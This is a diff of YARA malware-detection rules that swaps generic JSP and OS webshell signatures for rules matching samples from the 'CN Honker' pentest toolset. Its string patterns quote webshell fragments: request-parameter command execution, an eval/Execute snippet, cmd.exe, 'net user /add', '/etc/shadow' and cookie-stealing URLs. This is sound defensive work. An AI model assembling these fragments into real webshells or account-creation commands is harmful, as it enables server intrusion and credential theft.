+		id = "9f7fbaac-65b5-5162-87d1-96ccd9711adb"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L596-L612"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "82198670ac2072cd5c2853d59dcd0f8dfcc28923"
-		hash = "c05a520d96e4ebf9eb5c73fc0fa446ceb5caf343"
-		hash = "347a55c174ee39ec912d9107e971d740f3208d53af43ea480f502d177106bbe8"
-		hash = "d0ba29b646274e8cda5be1b940a38d248880d9e2bba11d994d4392c80d6b65bd"
-		logic_hash = "fffc173cc23e158e319e48097243a64da232151e441c39e4b6ecc2565a82d862"
-		score = 75
+		hash = "fa347fdb23ab0b8d0560a0d20c434549d78e99b5"
+		logic_hash = "e5e6a8a17592e7c82af830153905a52f8202a65c8e2f4b09dbebb19d04e2f8d7"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$exec = "ProcessBuilder" fullword wide ascii
-		$start = "start" fullword wide ascii
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
+		$s1 = "$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST[\"z1\"]):$_POST[\"z1\"];$u" wide
+		$s3 = "SETP c:\\windows\\system32\\cmd.exe " fullword wide
+		$s4 = "Ev al (\"Exe cute(\"\"On+Error+Resume+Next:%s:Response.Write(\"\"\"\"->|\"\"\"\"" wide
 
 	condition:
-		filesize < 2000 and ( any of ( $input* ) and any of ( $req* ) ) and $exec and $start
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-
-rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Reflection : FILE
+rule SIGNATURE_BASE_CN_Honker_Dedecms5_7 : FILE
 {
 	meta:
-		description = "Generic JSP webshell which uses reflection to execute user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "806ffc8b-1dc8-5e28-ae94-12ad3fee18cd"
-		date = "2021-01-07"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6005-L6087"
+		description = "Sample from CN Honker Pentest Toolset - file dedecms5.7.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b037862d-2821-5e96-996b-13ab241575ba"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L614-L629"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "62e6c6065b5ca45819c1fc049518c81d7d165744"
-		hash = "bf0ff88cbb72c719a291c722ae3115b91748d5c4920afe7a00a0d921d562e188"
-		logic_hash = "386aeb3745c5dd815f00bbc941450a2c3f1ddfc2956c67ecd5bee9318b1756ef"
-		score = 75
-		quality = -25
+		hash = "f9cbb25883828ca266e32ff4faf62f5a9f92c5fb"
+		logic_hash = "57ff887906d3c5e7eafc900581eea7432c7a18364b0061d0e4deba0229663c65"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$ws_exec = "invoke" fullword wide ascii
-		$ws_class = "Class" fullword wide ascii
-		$fp1 = "SOAPConnection"
-		$fp2 = "/CORBA/"
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
-		$cj_encoded1 = "\"java.util.Base64$Decoder\"" ascii wide
+		$s1 = "/data/admin/ver.txt" fullword ascii
+		$s2 = "SkinH_EL.dll" fullword ascii
 
 	condition:
-		all of ( $ws_* ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not any of ( $fp* ) and ( filesize < 10KB and ( any of ( $input* ) and any of ( $req* ) ) or ( filesize < 30KB and any of ( $cj_encoded* ) and math.entropy ( 500 , filesize -500 ) >= 5.5 and math.mean ( 500 , filesize -500 ) > 80 and math.deviation ( 500 , filesize -500 , 89.0 ) < 23 ) )
+		uint16( 0 ) == 0x5a4d and filesize < 830KB and all of them
 }
-
-rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Classloader : FILE
+rule SIGNATURE_BASE_CN_Honker_Alien_Ee : FILE
 {
 	meta:
-		description = "Generic JSP webshell which uses classloader to execute user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "037e6b24-9faf-569b-bb52-dbe671ab2e87"
-		date = "2021-01-07"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6089-L6166"
+		description = "Sample from CN Honker Pentest Toolset - file ee.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "03540f82-6662-55e3-97f8-38776271f08b"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L631-L646"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6b546e78cc7821b63192bb8e087c133e8702a377d17baaeb64b13f0dd61e2347"
-		hash = "f3a7e28e1c38fa5d37811bdda1d6b0893ab876023d3bd696747a35c04141dcf0"
-		hash = "8ea2a25344e6094fa82dfc097bbec5f1675f6058f2b7560deb4390bcbce5a0e7"
-		hash = "b9ea1e9f91c70160ee29151aa35f23c236d220c72709b2b75123e6fa1da5c86c"
-		hash = "80211c97f5b5cd6c3ab23ae51003fd73409d273727ba502d052f6c2bd07046d6"
-		hash = "8e544a5f0c242d1f7be503e045738369405d39731fcd553a38b568e0889af1f2"
-		logic_hash = "109c0063f4e8db6172fd872b3b93d4f069234f28bbf033fbd2c5f135051df77e"
-		score = 75
-		quality = -25
+		hash = "15a7211154ee7aca29529bd5c2500e0d33d7f0b3"
+		logic_hash = "1f40f6c53e13aeb6b44c58f6e048a35cf3fd9fb956f26d70b3fe91bcac340ab5"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$exec = "extends ClassLoader" wide ascii
-		$class = "defineClass" fullword wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
+		$s1 = "GetIIS UserName and PassWord." fullword wide
+		$s2 = "Read IIS ID For FreeHost." fullword wide
 
 	condition:
-		(( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and $exec and $class ) and ( filesize < 10KB or ( filesize < 50KB and ( math.entropy ( 500 , filesize -500 ) <= 1 or math.entropy ( 500 , filesize -500 ) >= 7.7 ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Encoded_Shell : FILE
+rule SIGNATURE_BASE_CN_Honker_Smsniff_Smsniff : FILE
 {
 	meta:
-		description = "Generic JSP webshell which contains cmd or /bin/bash encoded in ascii ord"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "359949d7-1793-5e13-9fdc-fe995ae12117"
-		date = "2021-01-07"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6168-L6194"
+		description = "Sample from CN Honker Pentest Toolset - file smsniff.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fef242d5-b274-5217-a5d1-1a6ec38d0fdd"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L648-L663"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3eecc354390d60878afaa67a20b0802ce5805f3a9bb34e74dd8c363e3ca0ea5c"
-		hash = "f6c2112e3a25ec610b517ff481675b2ce893cb9f"
-		hash = "62e6c6065b5ca45819c1fc049518c81d7d165744"
-		logic_hash = "74f45478e5bd7bb300e4ec493c2d3ef9a26340a141c3512a722618b3a3731500"
-		score = 75
-		quality = 58
+		hash = "8667a785a8ced76d0284d225be230b5f1546f140"
+		logic_hash = "6949f992d4734f18d9caffe83f2abccca0e0decef4169954518eed078d39e561"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$sj0 = /\{ ?47, 98, 105, 110, 47, 98, 97, 115, 104/ wide ascii
-		$sj1 = /\{ ?99, 109, 100}/ wide ascii
-		$sj2 = /\{ ?99, 109, 100, 46, 101, 120, 101/ wide ascii
-		$sj3 = /\{ ?47, 98, 105, 110, 47, 98, 97/ wide ascii
-		$sj4 = /\{ ?106, 97, 118, 97, 46, 108, 97, 110/ wide ascii
-		$sj5 = /\{ ?101, 120, 101, 99 }/ wide ascii
-		$sj6 = /\{ ?103, 101, 116, 82, 117, 110/ wide ascii
+		$s1 = "smsniff.exe" fullword wide
+		$s5 = "SmartSniff" fullword wide
 
 	condition:
-		filesize < 300KB and any of ( $sj* )
+		uint16( 0 ) == 0x5a4d and filesize < 267KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Netspy : FILE
+rule SIGNATURE_BASE_CN_Honker_Happy_Happy : FILE
 {
 	meta:
-		description = "JSP netspy webshell"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "41f5c171-878d-579f-811d-91d74f7e3e24"
-		date = "2021-01-24"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6196-L6262"
+		description = "Sample from CN Honker Pentest Toolset - file Happy.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6e6c806d-e784-507f-b327-3b9f2510422b"
+		date = "2015-06-23"
+		modified = "2023-01-27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L665-L683"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "94d1aaabde8ff9b4b8f394dc68caebf981c86587"
-		hash = "3870b31f26975a7cb424eab6521fc9bffc2af580"
-		logic_hash = "65432e42ad2626b62b1d1a6298c301513c2fb03d89193a77b053069cebcb45e9"
-		score = 75
-		quality = -24
+		hash = "92067d8dad33177b5d6c853d4d0e897f2ee846b0"
+		logic_hash = "667cd6629ca49f2200fdc0a5eb28c77c412ca25313fd9a8afb77dedfa66d2fa1"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$scan1 = "scan" nocase wide ascii
-		$scan2 = "port" nocase wide ascii
-		$scan3 = "web" fullword nocase wide ascii
-		$scan4 = "proxy" fullword nocase wide ascii
-		$scan5 = "http" fullword nocase wide ascii
-		$scan6 = "https" fullword nocase wide ascii
-		$write1 = "os.write" fullword wide ascii
-		$write2 = "FileOutputStream" fullword wide ascii
-		$write3 = "PrintWriter" fullword wide ascii
-		$http = "java.net.HttpURLConnection" fullword wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
+		$s1 = "<form.*?method=\"post\"[\\s\\S]*?</form>" fullword wide
+		$s2 = "domainscan.exe" fullword wide
+		$s3 = "http://www.happysec.com/" wide
+		$s4 = "cmdshell" fullword ascii
 
 	condition:
-		filesize < 30KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and 4 of ( $scan* ) and 1 of ( $write* ) and $http
+		uint16( 0 ) == 0x5a4d and filesize < 655KB and 2 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_By_String : FILE
+rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V3_0 : FILE
 {
 	meta:
-		description = "JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions."
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8d64e40b-5583-5887-afe1-b926d9880913"
-		date = "2021-01-09"
-		modified = "2025-08-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6264-L6363"
+		description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v3.0.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7513a513-e8a3-58a8-8dd5-512ba33ff013"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L685-L701"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e9060aa2caf96be49e3b6f490d08b8a996c4b084"
-		hash = "4c2464503237beba54f66f4a099e7e75028707aa"
-		hash = "06b42d4707e7326aff402ecbb585884863c6351a"
-		hash = "dada47c052ec7fcf11d5cfb25693bc300d3df87de182a254f9b66c7c2c63bf2e"
-		hash = "f9f6c696c1f90df6421cd9878a1dec51a62e91b4b4f7eac4920399cb39bc3139"
-		hash = "f1d8360dc92544cce301949e23aad6eb49049bacf9b7f54c24f89f7f02d214bb"
-		hash = "1d1f26b1925a9d0caca3fdd8116629bbcf69f37f751a532b7096a1e37f4f0076"
-		hash = "850f998753fde301d7c688b4eca784a045130039512cf51292fcb678187c560b"
-		logic_hash = "ab8d8df32ab745d8dd02d63d89264df2fbc0087daf6b4f91900ad03ab6e7949e"
-		score = 75
-		quality = -6
+		hash = "fa47c4affbac01ba5606c4862fdb77233c1ef656"
+		logic_hash = "fa65de4a135072f4d9a5d5711a4e2833b9d4a268a2a37c33d17e4546d172b6f1"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$jstring1 = "<title>Boot Shell</title>" wide ascii
-		$jstring2 = "String oraPWD=\"" wide ascii
-		$jstring3 = "Owned by Chinese Hackers!" wide ascii
-		$jstring4 = "AntSword JSP" wide ascii
-		$jstring5 = "JSP Webshell</" wide ascii
-		$jstring6 = "motoME722remind2012" wide ascii
-		$jstring7 = "EC(getFromBase64(toStringHex(request.getParameter(\"password" wide ascii
-		$jstring8 = "http://jmmm.com/web/index.jsp" wide ascii
-		$jstring9 = "list.jsp = Directory & File View" wide ascii
-		$jstring10 = "jdbcRowSet.setDataSourceName(request.getParameter(" wide ascii
-		$jstring11 = "Mr.Un1k0d3r RingZer0 Team" wide ascii
-		$jstring12 = "MiniWebCmdShell" fullword wide ascii
-		$jstring13 = "pwnshell.jsp" fullword wide ascii
-		$jstring14 = "session set &lt;key&gt; &lt;value&gt; [class]<br>" wide ascii
-		$jstring15 = "Runtime.getRuntime().exec(request.getParameter(" nocase wide ascii
-		$jstring16 = "GIF98a<%@page" wide ascii
-		$jstring17 = "Tas9er" fullword wide ascii
-		$jstring18 = "uu0028\\u" wide ascii
-		$jstring19 = "uu0065\\u" wide ascii
-		$jstring20 = "uu0073\\u" wide ascii
-		$jstring21 = /\\uuu{0,50}00/ wide ascii
-		$jstring22 = /[\w\.]\\u(FFFB|FEFF|FFF9|FFFA|200C|202E|202D)[\w\.]/ wide ascii
-		$jstring23 = "\"e45e329feb5d925b\"" wide ascii
-		$jstring24 = "u<![CDATA[n" wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$dex1 = "dex\n0"
-		$dex2 = "dey\n0"
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$s1 = "http://127.0.0.1/1.exe" fullword wide
+		$s2 = ":Rices  Forum:T00Ls.Net  [4 Fucker Te@m]" fullword wide
+		$s3 = "SkinH_EL.dll" fullword wide
 
 	condition:
-		not ( uint16( 0 ) == 0x5a4d or $dex1 at 0 or $dex2 at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( ( filesize < 100KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and any of ( $jstring* ) ) or ( filesize < 500KB and ( #jstring21 > 20 or $jstring18 or $jstring19 or $jstring20 ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Input_Upload_Write : FILE
+rule SIGNATURE_BASE_CN_Honker_Netfuke_Netfuke : FILE
 {
 	meta:
-		description = "JSP uploader which gets input, writes files and contains \"upload\""
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bbf26edd-88b7-5ec5-a16e-d96a086dcd19"
-		date = "2021-01-24"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6365-L6425"
+		description = "Sample from CN Honker Pentest Toolset - file NetFuke.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "833da5c7-e562-50e9-a2a9-54c36b0d1f61"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L703-L718"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ef98ca135dfb9dcdd2f730b18e883adf50c4ab82"
-		hash = "583231786bc1d0ecca7d8d2b083804736a3f0a32"
-		hash = "19eca79163259d80375ebebbc440b9545163e6a3"
-		logic_hash = "33b08a6118134819ec72a2eab0daf723c25c8869e0fa8a83f690b93e2667d15c"
-		score = 75
-		quality = 21
+		hash = "f89e223fd4f6f5a3c2a2ea225660ef0957fc07ba"
+		logic_hash = "86f6040b743b17fb300498b02a202d1a9090054a30d490f082b116d799c4bdb2"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$upload = "upload" nocase wide ascii
-		$write1 = "os.write" fullword wide ascii
-		$write2 = "FileOutputStream" fullword wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
+		$s1 = "Mac Flood: Flooding %dT %d p/s " fullword ascii
+		$s2 = "netfuke_%s.txt" fullword ascii
 
 	condition:
-		filesize < 10KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and $upload and 1 of ( $write* )
+		uint16( 0 ) == 0x5a4d and filesize < 1840KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_Generic_OS_Strings : FILE
+rule SIGNATURE_BASE_CN_Honker_Manualinjection : FILE
 {
 	meta:
-		description = "typical webshell strings"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ea85e415-4774-58ac-b063-0f5eb535ec49"
-		date = "2021-01-12"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L6427-L6596"
+		description = "Sample from CN Honker Pentest Toolset - file ManualInjection.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f0899003-824f-56ed-b653-9f7a77b9ec6a"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L720-L735"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d5bfe40283a28917fcda0cefd2af301f9a7ecdad"
-		hash = "fd45a72bda0a38d5ad81371d68d206035cb71a14"
-		hash = "b4544b119f919d8cbf40ca2c4a7ab5c1a4da73a3"
-		hash = "569259aafe06ba3cef9e775ee6d142fed6edff5f"
-		hash = "48909d9f4332840b4e04b86f9723d7427e33ac67"
-		hash = "0353ae68b12b8f6b74794d3273967b530d0d526f"
-		logic_hash = "10b956cac601c97d1483d35a7730d7178c4175800b4e4c9ed62ad583d3cac3d7"
-		score = 50
-		quality = -123
+		hash = "e83d427f44783088a84e9c231c6816c214434526"
+		logic_hash = "fe8eba3b79f5bc4cf820ff51816c3f2a27d6ed8f6ab3963f88a3232c9a4b5c1e"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$fp1 = "http://evil.com/" wide ascii
-		$fp2 = "denormalize('/etc/shadow" wide ascii
-		$fp3 = "vim.org>"
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$w1 = "net localgroup administrators" nocase wide ascii
-		$w2 = "net user" nocase wide ascii
-		$w3 = "/add" nocase wide ascii
-		$l1 = "/etc/shadow" wide ascii
-		$l2 = "/etc/ssh/sshd_config" wide ascii
-		$take_two1 = "net user" nocase wide ascii
-		$take_two2 = "/add" nocase wide ascii
+		$s0 = "http://127.0.0.1/cookie.asp?fuck=" fullword ascii
+		$s16 = "http://Www.cnhuker.com | http://www.0855.tv" fullword ascii
 
 	condition:
